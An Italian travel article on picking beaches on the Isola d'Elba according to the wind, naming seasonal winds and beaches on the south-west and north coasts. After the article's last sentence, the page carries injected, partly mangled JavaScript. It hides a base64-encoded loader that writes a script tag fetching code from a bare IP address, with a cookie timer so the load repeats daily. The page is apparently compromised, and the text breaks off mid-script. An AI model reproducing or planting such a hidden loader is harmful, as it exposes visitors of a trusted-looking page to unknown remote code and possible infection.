Come scegliere la spiaggia giusta all’Isola d’Elba in base al vento e alle condizioni del mare
Il meteo mare dell’Elba nei prossimi giorni annuncia bel tempo? Allora è il caso di approfittarne per partire alla scoperta di una delle isole più belle del Mediterraneo. Un’isola ricca di spiagge sabbiose, rocciose o ghiaiose, calette isolate, anfratti nascosti e lidi attrezzati: davvero tutto quello che serve per accontentare anche i gusti più esigenti.
Grazie al clima tipicamente marittimo, le previsioni meteo all’Elba per il mare raramente sono negative: non piove praticamente mai e, anche quando soffiano i venti di Libeccio o di Ponente, i più ostili alla navigazione, difficilmente viene interrotto il servizio dei traghetti provenienti da Piombino e mai comunque per periodi prolungati.
Quando le previsioni del mare all’Elba sconsigliano la navigazione, è preferibile evitare di salpare con la propria barca a vela, a meno che non si sia esperti. In generale è bene sapere che bisogna dirigersi sul versante opposto alla direzione da cui proviene il vento e comunque scegliere sempre una meta alternativa nel caso in cui abbiate del mare dell’Elba previsioni incerte.
La conformazione dell’isola e la struttura frastagliata delle coste fanno sì che le condizioni climatiche dell’Elba siano buone tutto l’anno, poiché le uniche correnti fredde provenienti da nord vengono arginate dal massiccio montuoso che ha la vetta più alta nel Monte Capanne.
Nella stagione autunnale e in quella primaverile, quando le previsioni del mare sull’Isola d’Elba sono le meno favorevoli, è meglio dirigersi sul versante sud-ovest dove si trovano Fetovaia, Seccheto e Cavoli. È qui che le temperature sono più calde rispetto al resto dell’Isola, perché è qui che soffia il vento di Scirocco che in queste stagioni mitiga il clima ancora fresco.
Nei mesi estivi approfittate invece del refrigerio dei venti di Maestrale e Grecale per sfruttare la costa nord dell’isola, dove troverete le località balneari di Capo Bianco, Enfola, le Ghiaie, Marciana Marina, la Padulella, Portoferraio, Procchio, Sansone, Scaglieri e Viticcio: il vostro soggiorno sarà meno afoso. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘